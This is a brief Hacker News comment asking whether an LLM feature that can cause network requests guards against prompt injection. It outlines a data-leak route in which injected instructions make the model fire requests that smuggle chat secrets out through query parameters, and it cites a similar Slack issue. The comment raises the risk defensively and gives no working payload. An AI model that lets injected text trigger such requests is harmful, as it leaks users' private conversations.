Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

My assumption was that the reason this wasn't already implemented was due to security concerns, that via prompt injection, elements of the chat could be leaked by any feature that causes the LLM to even by side effect cause a network request to be fired.

Much like the Slack issue of smuggling chat secrets out via query parameters.

Has that been considered at all here, or is it on the user to vet the models suggestions?



Consider applying for YC's Summer 2026 batch! Applications are open till May 4

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: